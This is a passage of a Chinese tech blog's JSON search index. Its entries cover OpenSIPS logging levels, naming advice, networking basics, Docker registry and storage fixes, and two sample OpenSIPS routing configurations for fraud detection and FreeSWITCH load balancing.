设置日志级别2.x的opensips使用 log_level=3 设置日志级别\n动态设置日志级别 在程序运行时,可以通过opensipctl 命令动态设置日志级别\nopensipsctl fifo log_level -2 最好使用日志级别 不要为了简便,都用 xlog(\u0026#34;msg\u0026#34;) 如果msg是信息级别,用xlog(\u0026#34;L_INFO\u0026#34;, \u0026#34;msg\u0026#34;) 如果msg是错误信息,则使用xlog(\u0026#34;msg\u0026#34;) ","permalink":"https://wdd.js.org/opensips/ch5/xlog-level/","summary":"建议日志格式 xlog(\u0026#34;$rm $fu-\u0026gt;$tu:$cfg_line some msg\u0026#34;) 日志级别 L_ALERT (-3) L_CRIT (-2) L_ERR (-1) - this is used by default if log_level is omitted L_WARN (1) L_NOTICE (2) L_INFO (3) L_DBG (4) 日志级别如果设置为2, 那么只会打印小于等于2的日志。默认使用xlog(\u0026ldquo;hello\u0026rdquo;), 那么日志级别就会是L_ERR\n生产环境建议将日志界别调整到-1\n1.x的opensips使用 
debug=3 设置日志级别2.x的opensips使用 log_level=3 设置日志级别\n动态设置日志级别 在程序运行时,可以通过opensipsctl 命令动态设置日志级别\nopensipsctl fifo log_level -2 最好使用日志级别 不要为了简便,都用 xlog(\u0026#34;msg\u0026#34;) 如果msg是信息级别,用xlog(\u0026#34;L_INFO\u0026#34;, \u0026#34;msg\u0026#34;) 如果msg是错误信息,则使用xlog(\u0026#34;msg\u0026#34;) ","title":"日志xlog"},{"content":" 变量不要使用缩写,要见名知意。现代化的IDE都提供自动补全功能,即使是VIM, 也可以用ctrl+n, ctrl+p, ctrl+y, ctrl+e去自动补全。 变量名缩写真是灾难。 ","permalink":"https://wdd.js.org/posts/2019/07/pxdvcx/","summary":" 变量不要使用缩写,要见名知意。现代化的IDE都提供自动补全功能,即使是VIM, 也可以用ctrl+n, ctrl+p, ctrl+y, ctrl+e去自动补全。 变量名缩写真是灾难。 ","title":"编码规则"},{"content":"图片来自 https://microchipdeveloper.com/ 只不过这个网站访问速度很慢,但是里面的图片非常有意思,能够简洁明了地说明一个概念。\n上学的时候,数学老师喜欢在讲课前先讲一些概念,然后再做题。但是我觉得概念并没有那么重要,我更喜欢做题。\n但是,当你理解了概念后,再去实战,就有事半功倍的效果。\n1. 路由器 路由器(英语:Router,又称路径器)是一种电讯网络设备,提供路由与转送两种重要机制,可以决定数据包从来源端到目的端所经过的路由路径(host到host之间的传输路径),这个过程称为路由;将路由器输入端的数据包移送至适当的路由器输出端(在路由器内部进行),这称为转送。路由工作在OSI模型的第三层——即网络层,例如网际协议(IP)。\n路由器用来做网络之间的连接,所以路由器一般至少会连接到两个网络上。常见的就是一边连接外网,一边连接内网。\n2. IP地址 3. 交换机 4. 五层网络模型 5. TCP vs UDP 6. TCP 和 UDP 头 7. 常见的端口号 8. 客户端和服务端 9. Socket 10. Socket建立 11. 一个Web服务器的工作过程 step1: 服务器在80端口监听消息 step2: 客户端随机选择一个端口,向服务端发起连接请求 step3: 传输层将消息传输给服务器 服务端建立一个Socket用来和客户端建立通道\nstep4: 服务器通过socket将html发给客户端 step5: 消息接收完毕,Socket关闭 12 NAT 参考 https://zh.wikipedia.org/wiki/%E8%B7%AF%E7%94%B1%E5%99%A8 ","permalink":"https://wdd.js.org/network/graph-network/","summary":"图片来自 https://microchipdeveloper.com/ 只不过这个网站访问速度很慢,但是里面的图片非常有意思,能够简洁明了地说明一个概念。\n上学的时候,数学老师喜欢在讲课前先讲一些概念,然后再做题。但是我觉得概念并没有那么重要,我更喜欢做题。\n但是,当你理解了概念后,再去实战,就有事半功倍的效果。\n1. 路由器 路由器(英语:Router,又称路径器)是一种电讯网络设备,提供路由与转送两种重要机制,可以决定数据包从来源端到目的端所经过的路由路径(host到host之间的传输路径),这个过程称为路由;将路由器输入端的数据包移送至适当的路由器输出端(在路由器内部进行),这称为转送。路由工作在OSI模型的第三层——即网络层,例如网际协议(IP)。\n路由器用来做网络之间的连接,所以路由器一般至少会连接到两个网络上。常见的就是一边连接外网,一边连接内网。\n2. IP地址 3. 交换机 4. 五层网络模型 5. TCP vs UDP 6. TCP 和 UDP 头 7. 常见的端口号 8. 客户端和服务端 9. Socket 10. Socket建立 11. 
一个Web服务器的工作过程 step1: 服务器在80端口监听消息 step2: 客户端随机选择一个端口,向服务端发起连接请求 step3: 传输层将消息传输给服务器 服务端建立一个Socket用来和客户端建立通道\nstep4: 服务器通过socket将html发给客户端 step5: 消息接收完毕,Socket关闭 12 NAT 参考 https://zh.wikipedia.org/wiki/%E8%B7%AF%E7%94%B1%E5%99%A8 ","title":"图解通信网络 第二版"},{"content":"使用HTTP仓库 默认docker不允许使用HTTP的仓库,只允许HTTPS的仓库。如果你用http的仓库,可能会报如下的错误。\nGet https://registry:5000/v1/_ping: http: server gave HTTP response to HTTPS client\n解决方案是:配置insecure-registries使docker使用我们的http仓库。\n在 /etc/docker/daemon.json 文件中添加\n{ \u0026#34;insecure-registries\u0026#34; : [\u0026#34;registry:5000\u0026#34;, \u0026#34;harbor:5000\u0026#34;] } 重启docker\nservice docker restart # 执行命令 docker info | grep insecure 应该可以看到不安全仓库 存储问题 有些docker的存储策略并未指定,在运行容器时,可能会报如下错误\n/usr/bin/docker-current: Error response from daemon: error creating overlay mount to\n解决方案:\nvim /etc/sysconfig/docker-storage\nDOCKER_STORAGE_OPTIONS=\u0026#34;-s overlay\u0026#34; systemctl daemon-reload service docker restart ","permalink":"https://wdd.js.org/posts/2019/07/fpbkzg/","summary":"使用HTTP仓库 默认docker不允许使用HTTP的仓库,只允许HTTPS的仓库。如果你用http的仓库,可能会报如下的错误。\nGet https://registry:5000/v1/_ping: http: server gave HTTP response to HTTPS client\n解决方案是:配置insecure-registries使docker使用我们的http仓库。\n在 /etc/docker/daemon.json 文件中添加\n{ \u0026#34;insecure-registries\u0026#34; : [\u0026#34;registry:5000\u0026#34;, \u0026#34;harbor:5000\u0026#34;] } 重启docker\nservice docker restart # 执行命令 docker info | grep insecure 应该可以看到不安全仓库 存储问题 有些docker的存储策略并未指定,在运行容器时,可能会报如下错误\n/usr/bin/docker-current: Error response from daemon: error creating overlay mount to\n解决方案:\nvim /etc/sysconfig/docker-storage\nDOCKER_STORAGE_OPTIONS=\u0026#34;-s overlay\u0026#34; systemctl daemon-reload service docker restart ","title":"Docker相关问题及解决方案"},{"content":"# # $Id$ # # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the 
\u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. # ####### Global Parameters ######### log_level=3 log_stderror=yes log_facility=LOG_LOCAL0 children=4 memdump=-1 /* uncomment the following line to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:127.0.0.1:5060 # CUSTOMIZE ME listen=udp:10.0.2.8:5060 # CUSTOMIZE ME ####### Modules Section ######## #set module path mpath=\u0026#34;modules/\u0026#34; loadmodule \u0026#34;proto_udp.so\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 5) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; 
modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 1) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; loadmodule \u0026#34;drouting.so\u0026#34; modparam(\u0026#34;drouting\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) loadmodule \u0026#34;fraud_detection.so\u0026#34; modparam(\u0026#34;fraud_detection\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) loadmodule \u0026#34;event_route.so\u0026#34; loadmodule \u0026#34;cachedb_local.so\u0026#34; #loadmodule \u0026#34;aaa_radius.so\u0026#34; #modparam(\u0026#34;aaa_radius\u0026#34;,\u0026#34;radius_config\u0026#34;,\u0026#34;modules/acc/etc/radius/radiusclient.conf\u0026#34;) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ #modparam(\u0026#34;acc\u0026#34;, \u0026#34;aaa_url\u0026#34;, \u0026#34;radius:modules/acc/etc/radius/radiusclient.conf\u0026#34;) modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. 
if you enable this parameter, be sure the enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) #modparam(\u0026#34;acc\u0026#34;, \u0026#34;multi_leg_info\u0026#34;, \u0026#34;text1=$avp(src);text2=$avp(dst)\u0026#34;) #modparam(\u0026#34;acc\u0026#34;, \u0026#34;multi_leg_bye_info\u0026#34;, \u0026#34;text1=$avp(src);text2=$avp(dst)\u0026#34;) /* account triggers (flags) */ loadmodule \u0026#34;avpops.so\u0026#34; modparam(\u0026#34;avpops\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;1 mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) loadmodule \u0026#34;db_mysql.so\u0026#34; modparam(\u0026#34;db_mysql\u0026#34;, \u0026#34;exec_query_threshold\u0026#34;, 500000) loadmodule \u0026#34;cfgutils.so\u0026#34; loadmodule \u0026#34;dialog.so\u0026#34; loadmodule \u0026#34;rest_client.so\u0026#34; loadmodule \u0026#34;dispatcher.so\u0026#34; modparam(\u0026#34;dispatcher\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://root:summit2017@127.0.0.1/opensips_2_3\u0026#34;) ####### Routing Logic ######## # main request routing logic route { if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # sequential requests within a dialog should # take the path determined by record-routing if (loose_route()) { if (is_method(\u0026#34;INVITE\u0026#34;)) { # even if in most of the cases is useless, do RR for # re-INVITEs alos, as some buggy clients do change route set # during the dialog. record_route(); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). route(relay); } else { if ( is_method(\u0026#34;ACK\u0026#34;) ) { if ( t_check_trans() ) { # non loose-route, but stateful ACK; must be an ACK after # a 487 or e.g. 
404 from upstream server t_relay(); exit; } else { # ACK without matching transaction -\u0026gt; # ignore and discard exit; } } sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); } exit; } if (is_method(\u0026#34;REGISTER\u0026#34;)) { if (!save(\u0026#34;location\u0026#34;)) sl_reply_error(); exit; } # CANCEL processing if (is_method(\u0026#34;CANCEL\u0026#34;)) { if (t_check_trans()) t_relay(); exit; } t_check_trans(); if ( !(is_method(\u0026#34;REGISTER\u0026#34;) ) ) { if (from_uri==myself) { } else { # if caller is not local, then called number must be local } } # preloaded route checking if (loose_route()) { xlog(\u0026#34;L_ERR\u0026#34;, \u0026#34;Attempt to route with preloaded Route\u0026#39;s [$fu/$tu/$ru/$ci]\u0026#34;); if (!is_method(\u0026#34;ACK\u0026#34;)) sl_send_reply(\u0026#34;403\u0026#34;,\u0026#34;Preload Route denied\u0026#34;); exit; } # record routing if (!is_method(\u0026#34;REGISTER|MESSAGE\u0026#34;)) record_route(); # account only INVITEs if (is_method(\u0026#34;INVITE\u0026#34;)) { create_dialog(); do_accounting(\u0026#34;evi\u0026#34;, \u0026#34;cdr|missed|failed\u0026#34;); } if (!uri==myself) { append_hf(\u0026#34;P-hint: outbound\\r\\n\u0026#34;); route(relay); } # requests for my domain if (is_method(\u0026#34;PUBLISH|SUBSCRIBE\u0026#34;)) { sl_send_reply(\u0026#34;503\u0026#34;, \u0026#34;Service Unavailable\u0026#34;); exit; } if ($rU==NULL) { # request with no Username in RURI sl_send_reply(\u0026#34;484\u0026#34;,\u0026#34;Address Incomplete\u0026#34;); exit; } if (!check_fraud(\u0026#34;$fU\u0026#34;, \u0026#34;$rU\u0026#34;, \u0026#34;2\u0026#34;)) { send_reply(\u0026#34;403\u0026#34;, \u0026#34;Forbidden\u0026#34;); exit; } $du = \u0026#34;sip:10.0.2.8:7050\u0026#34;; route(relay); } route [relay] { # for INVITEs enable some additional helper routes if (is_method(\u0026#34;INVITE\u0026#34;)) { t_on_branch(\u0026#34;per_branch_ops\u0026#34;); t_on_reply(\u0026#34;handle_nat\u0026#34;); 
t_on_failure(\u0026#34;missed_call\u0026#34;); } if (!t_relay()) { send_reply(\u0026#34;500\u0026#34;,\u0026#34;Internal Error\u0026#34;); }; exit; } branch_route[per_branch_ops] { xlog(\u0026#34;new branch at $ru\\n\u0026#34;); } onreply_route[handle_nat] { xlog(\u0026#34;incoming reply\\n\u0026#34;); } route [ds_route] { xlog(\u0026#34;foo\\n\u0026#34;); } failure_route[missed_call] { if (t_was_cancelled()) { exit; } # uncomment the following lines if you want to block client # redirect based on 3xx replies. ##if (t_check_status(\u0026#34;3[0-9][0-9]\u0026#34;)) { ##t_reply(\u0026#34;404\u0026#34;,\u0026#34;Not found\u0026#34;); ##\texit; ##} } event_route [E_FRD_WARNING] { fetch_event_params(\u0026#34;$var(param);$var(val);$var(thr);$var(user);$var(number);$var(ruleid)\u0026#34;); xlog(\u0026#34;E_FRD_WARNING: $var(param);$var(val);$var(thr);$var(user);$var(number);$var(ruleid)\\n\u0026#34;); if ($var(param) == \u0026#34;calls per minute\u0026#34;) { xlog(\u0026#34;e_frd_cpm++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cpm\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;call_duration\u0026#34;) { xlog(\u0026#34;e_frd_cdur++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cdur\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;total calls\u0026#34;) { xlog(\u0026#34;e_frd_tc++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_tc\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;concurrent calls\u0026#34;) { xlog(\u0026#34;e_frd_cc++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cc\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;sequential calls\u0026#34;) { xlog(\u0026#34;e_frd_seq++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_seq\u0026#34;, 1, 0); } } event_route [E_FRD_CRITICAL] { fetch_event_params(\u0026#34;$var(param);$var(val);$var(thr);$var(user);$var(number);$var(ruleid)\u0026#34;); xlog(\u0026#34;E_FRD_CRITICAL: 
$var(param);$var(val);$var(thr);$var(user);$var(number);$var(ruleid)\\n\u0026#34;); if ($var(param) == \u0026#34;calls per minute\u0026#34;) { xlog(\u0026#34;e_frd_critcpm++\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcpm\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;call_duration\u0026#34;) { xlog(\u0026#34;e_frd_critcdur++\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcdur\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;total calls\u0026#34;) { xlog(\u0026#34;e_frd_crittc++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_crittc\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;concurrent calls\u0026#34;) { xlog(\u0026#34;e_frd_critcc++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcc\u0026#34;, 1, 0); } else if ($var(param) == \u0026#34;sequential calls\u0026#34;) { xlog(\u0026#34;e_frd_critseq++!\\n\u0026#34;); cache_add(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critseq\u0026#34;, 1, 0); } } route [store_influxdb] { $var(body) = $param(2) + \u0026#34;,host=\u0026#34; + $param(3) + \u0026#34; value=\u0026#34; + $param(4); xlog(\u0026#34;XXX posting: $var(body) ($param(1) / $param(2) / $param(4))\\n\u0026#34;); if (!rest_post(\u0026#34;http://localhost:8086/write?db=$param(1)\u0026#34;, \u0026#34;$var(body)\u0026#34;, , \u0026#34;$var(body)\u0026#34;)) { xlog(\u0026#34;ERR in rest_post!\\n\u0026#34;); exit; } } timer_route [dump_fraud_cpm, 1] { $var(cpm) = 0; $var(ccpm) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cpm\u0026#34;, $var(cpm)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcpm\u0026#34;, $var(ccpm)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cpm\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcpm\u0026#34;); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;cpm\u0026#34;, \u0026#34;serverA\u0026#34;, $var(cpm)); route(store_influxdb, 
\u0026#34;fraud_demo\u0026#34;, \u0026#34;critcpm\u0026#34;, \u0026#34;serverA\u0026#34;, $var(ccpm)); xlog(\u0026#34;XXX stats: $var(cpm) / $var(ccpm)\\n\u0026#34;); } timer_route [dump_fraud_cdur, 1] { $var(cdur) = 0; $var(ccdur) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cdur\u0026#34;, $var(cdur)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcdur\u0026#34;, $var(ccdur)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cdur\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcdur\u0026#34;); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;cdur\u0026#34;, \u0026#34;serverA\u0026#34;, $var(cdur)); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;critcdur\u0026#34;, \u0026#34;serverA\u0026#34;, $var(ccdur)); xlog(\u0026#34;XXX stats: $var(cdur) / $var(ccdur)\\n\u0026#34;); } timer_route [dump_fraud_tc, 1] { $var(tc) = 0; $var(ctc) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_tc\u0026#34;, $var(tc)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_crittc\u0026#34;, $var(ctc)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_tc\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_crittc\u0026#34;); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;tc\u0026#34;, \u0026#34;serverA\u0026#34;, $var(tc)); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;crittc\u0026#34;, \u0026#34;serverA\u0026#34;, $var(ctc)); xlog(\u0026#34;XXX stats: $var(tc) / $var(ctc)\\n\u0026#34;); } timer_route [dump_fraud_cc, 1] { $var(cc) = 0; $var(ccc) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cc\u0026#34;, $var(cc)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcc\u0026#34;, $var(ccc)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_cc\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critcc\u0026#34;); route(store_influxdb, 
\u0026#34;fraud_demo\u0026#34;, \u0026#34;cc\u0026#34;, \u0026#34;serverA\u0026#34;, $var(cc)); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;critcc\u0026#34;, \u0026#34;serverA\u0026#34;, $var(ccc)); xlog(\u0026#34;XXX stats: $var(cc) / $var(ccc)\\n\u0026#34;); } timer_route [dump_fraud_seq, 1] { $var(seq) = 0; $var(cseq) = 0; cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_seq\u0026#34;, $var(seq)); cache_counter_fetch(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critseq\u0026#34;, $var(cseq)); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_seq\u0026#34;); cache_remove(\u0026#34;local\u0026#34;, \u0026#34;e_frd_critseq\u0026#34;); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;seq\u0026#34;, \u0026#34;serverA\u0026#34;, $var(seq)); route(store_influxdb, \u0026#34;fraud_demo\u0026#34;, \u0026#34;critseq\u0026#34;, \u0026#34;serverA\u0026#34;, $var(cseq)); xlog(\u0026#34;XXX stats: $var(seq) / $var(cseq)\\n\u0026#34;); } ","permalink":"https://wdd.js.org/opensips/ch8/fraud/","summary":"# # $Id$ # # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=3 log_stderror=yes log_facility=LOG_LOCAL0 children=4 memdump=-1 /* uncomment the following line to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:127.","title":"opensips-summit-fraud"},{"content":"# # OpenSIPS residential configuration script # by OpenSIPS Solutions \u0026lt;team@opensips-solutions.com\u0026gt; # # This script was generated via \u0026#34;make menuconfig\u0026#34;, from # the \u0026#34;Residential\u0026#34; scenario. # You can enable / disable more features / functionalities by # re-generating the scenario with different options.# # # Please refer to the Core CookBook at: # http://www.opensips.org/Resources/DocsCookbooks # for a explanation of possible statements, functions and parameters. 
# ####### Global Parameters ######### log_level=3 memdump=1 log_stderror=yes log_facility=LOG_LOCAL0 children=10 /* uncomment the following lines to enable debugging */ #debug_mode=yes /* uncomment the next line to enable the auto temporary blacklisting of not available destinations (default disabled) */ #disable_dns_blacklist=no /* uncomment the next line to enable IPv6 lookup after IPv4 dns lookup failures (default disabled) */ #dns_try_ipv6=yes /* comment the next line to enable the auto discovery of local aliases based on revers DNS on IPs */ auto_aliases=no listen=udp:192.168.56.1:5070 # CUSTOMIZE ME ####### Modules Section ######## #set module path mpath=\u0026#34;modules/\u0026#34; loadmodule \u0026#34;httpd.so\u0026#34; modparam(\u0026#34;httpd\u0026#34;, \u0026#34;port\u0026#34;, 8081) loadmodule \u0026#34;mi_json.so\u0026#34; #### SIGNALING module loadmodule \u0026#34;signaling.so\u0026#34; #### StateLess module loadmodule \u0026#34;sl.so\u0026#34; #### Transaction Module loadmodule \u0026#34;tm.so\u0026#34; modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_timeout\u0026#34;, 2) modparam(\u0026#34;tm\u0026#34;, \u0026#34;fr_inv_timeout\u0026#34;, 30) modparam(\u0026#34;tm\u0026#34;, \u0026#34;restart_fr_on_each_reply\u0026#34;, 0) modparam(\u0026#34;tm\u0026#34;, \u0026#34;onreply_avp_mode\u0026#34;, 1) loadmodule \u0026#34;cachedb_local.so\u0026#34; loadmodule \u0026#34;mathops.so\u0026#34; modparam(\u0026#34;mathops\u0026#34;, \u0026#34;decimal_digits\u0026#34;, 12) loadmodule \u0026#34;rest_client.so\u0026#34; #### Record Route Module loadmodule \u0026#34;rr.so\u0026#34; /* do not append from tag to the RR (no need for this script) */ modparam(\u0026#34;rr\u0026#34;, \u0026#34;append_fromtag\u0026#34;, 0) #### MAX ForWarD module loadmodule \u0026#34;maxfwd.so\u0026#34; #### SIP MSG OPerationS module loadmodule \u0026#34;sipmsgops.so\u0026#34; #### FIFO Management Interface loadmodule \u0026#34;mi_fifo.so\u0026#34; modparam(\u0026#34;mi_fifo\u0026#34;, 
\u0026#34;fifo_name\u0026#34;, \u0026#34;/tmp/opensips_fifo_2\u0026#34;) modparam(\u0026#34;mi_fifo\u0026#34;, \u0026#34;fifo_mode\u0026#34;, 0666) #### URI module loadmodule \u0026#34;uri.so\u0026#34; modparam(\u0026#34;uri\u0026#34;, \u0026#34;use_uri_table\u0026#34;, 0) loadmodule \u0026#34;cfgutils.so\u0026#34; #### USeR LOCation module loadmodule \u0026#34;usrloc.so\u0026#34; modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;nat_bflag\u0026#34;, \u0026#34;NAT\u0026#34;) modparam(\u0026#34;usrloc\u0026#34;, \u0026#34;db_mode\u0026#34;, 0) #### REGISTRAR module loadmodule \u0026#34;registrar.so\u0026#34; modparam(\u0026#34;registrar\u0026#34;, \u0026#34;tcp_persistent_flag\u0026#34;, \u0026#34;TCP_PERSISTENT\u0026#34;) /* uncomment the next line not to allow more than 10 contacts per AOR */ #modparam(\u0026#34;registrar\u0026#34;, \u0026#34;max_contacts\u0026#34;, 10) #### ACCounting module loadmodule \u0026#34;acc.so\u0026#34; /* what special events should be accounted ? */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;early_media\u0026#34;, 0) modparam(\u0026#34;acc\u0026#34;, \u0026#34;report_cancels\u0026#34;, 0) /* by default we do not adjust the direct of the sequential requests. 
if you enable this parameter, be sure the enable \u0026#34;append_fromtag\u0026#34; in \u0026#34;rr\u0026#34; module */ modparam(\u0026#34;acc\u0026#34;, \u0026#34;detect_direction\u0026#34;, 0) loadmodule \u0026#34;proto_udp.so\u0026#34; loadmodule \u0026#34;dialog.so\u0026#34; loadmodule \u0026#34;statistics.so\u0026#34; loadmodule \u0026#34;load_balancer.so\u0026#34; modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;db_url\u0026#34;, \u0026#34;mysql://opensips:opensipsrw@192.168.56.128/opensips\u0026#34;) modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;initial_freeswitch_load\u0026#34;, 15) modparam(\u0026#34;load_balancer\u0026#34;, \u0026#34;fetch_freeswitch_stats\u0026#34;, 1) loadmodule \u0026#34;freeswitch.so\u0026#34; loadmodule \u0026#34;db_mysql.so\u0026#34; ####### Routing Logic ######## # main request routing logic startup_route { $stat(neg_replies) = 0; } route { if ($stat(neg_replies) == \u0026#34;\u0026lt;null\u0026gt;\u0026#34;) $stat(neg_replies) = 0; if (!mf_process_maxfwd_header(\u0026#34;10\u0026#34;)) { sl_send_reply(\u0026#34;483\u0026#34;,\u0026#34;Too Many Hops\u0026#34;); exit; } if (has_totag()) { # handle hop-by-hop ACK (no routing required) if ( is_method(\u0026#34;ACK\u0026#34;) \u0026amp;\u0026amp; t_check_trans() ) { t_relay(); exit; } # sequential request within a dialog should # take the path determined by record-routing if ( !loose_route() ) { # we do record-routing for all our traffic, so we should not # receive any sequential requests without Route hdr. sl_send_reply(\u0026#34;404\u0026#34;,\u0026#34;Not here\u0026#34;); exit; } if (is_method(\u0026#34;BYE\u0026#34;)) { # do accounting even if the transaction fails do_accounting(\u0026#34;log\u0026#34;,\u0026#34;failed\u0026#34;); } # route it out to whatever destination was set by loose_route() # in $du (destination URI). 
